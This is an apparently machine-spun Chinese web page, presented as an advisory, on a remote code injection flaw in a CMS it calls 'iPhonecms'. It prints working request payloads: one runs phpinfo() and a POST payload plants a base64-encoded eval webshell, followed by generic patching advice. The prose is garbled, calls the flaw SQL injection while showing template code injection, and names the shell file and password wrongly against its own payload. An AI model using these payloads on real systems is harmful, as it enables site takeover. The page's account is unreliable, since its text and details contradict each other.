18720358503 在线客服 人才招聘 返回顶部
企业动态 技术分享 行业动态

iPhonecms网站系统漏洞修补处理方法

2021-02-19分享 "> 对不起,没有下一图集了!">

iPhonecms网站系统漏洞修补处理方法


短视頻,自新闻媒体,达人种草1站服务

iPhonecms系统软件,是现阶段许多电影网站都在应用的1套网站系统软件,开源系统,完全免费,拓展性较好,适用1键收集,伪静态数据化,分布式系统的另外承载,得到的许多站长的喜爱,于近日被网站安全性检验发现,mams存在网站系统漏洞,sql引入盲射获得数据信息库的管理方法员账户登陆密码,有关该系统漏洞的详细信息,大家细心剖析看下.

mams系统漏洞剖析与修补

iPhoneCMS选用的是php語言开发设计的编码,应用的数据信息库是mysql种类,这类构架是较为常见的,也是较为平稳的,可是在安全性层面出現的难题是较为多的,这次发现的是sql引入系统漏洞,在网站的根文件目录下的inc文档里的module文件目录下的vod.php编码以下图所示:

编码里的empty($wd涵数,在开展分辨假如是,或并不是的逻辑性全过程之中,会将前段客户浏览带来的主要参数,开展安全性过虑,大家跟进编码来寻觅到iPhoneCMS的配备文档,在function.php配备文档编码李看到对网站的全部恳求方法包含get、post、cookies的递交方法都强制性性的开展了安全性转义。网站系统漏洞难题的产生就在这里.

大家细心又发现,mams应用了360安全性出示的避免sql引入阻拦编码。360的避免sql引入是好几年前开发设计,并公布在互联网上的,早已很久沒有升级维护保养了而且还存在sql引入编码绕开的状况,主要参数值之间开展实体线变换的情况下,360的sql阻拦标准沒有对空白符和反斜杠开展阻拦,致使能够绕开插进故意主要参数,立即恳求到iPhonecms后端开发数据信息库中去,获得iPhoneCMS的管理方法员账户登陆密码。

大家看来下怎样运用iPhoneCMS的系统漏洞,从上面系统漏洞产生的细节里能够看出,是由于阻拦sql引入句子的全过程中存在能够被绕开的系统漏洞。大家来应用%0b,和空格对编码开展引入,sql句子在拼接中,能够插进反斜杠开展单引号的出错,从而绕开iPhoneCMS的安全性阻拦。句子以下:

GET恳求:

127.0.0.1/index.PHP?m=vod-search wd={if-A:phpinfo()}{endif-A}

能够立即看php的实际信息内容

POST恳求

能够立即获得webshell

127.0.0.1/index.PHP?m=vod-search

POST內容以下:

wd={if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

能够立即转化成带有1句话木马后门的编码,文档名为safe.php,1句话木马连接登陆密码是safe.

怎样修补iPhonecms网站系统漏洞呢?

对网站系统漏洞的修补大家要了解系统漏洞造成的缘故,和为什么会绕开iPhoneCMS的安全性过虑,mams应用的addslash安全性涵数,sql中沒有加单引号的安全性安全防护,in字句也很非常容易忘掉加引号,再1个后期解决安全性过虑的情况下能够插进单引号,stripslash致使能够添加单引号,编解码致使绕开addslash,应用urldecode编号开展引入绕开,依据上面提出的系统漏洞绕开,大家SINE安全性提出系统漏洞修补的提议是:对URL解码开展两层的转义,对get,post,cookies的阻拦标准开展安全性升级,提升空格,和百分标记的阻拦,假如对程序流程编码不熟习的话提议资询技术专业的网站安全性企业来解决处理。


"> 对不起,没有下一图集了!">
在线咨询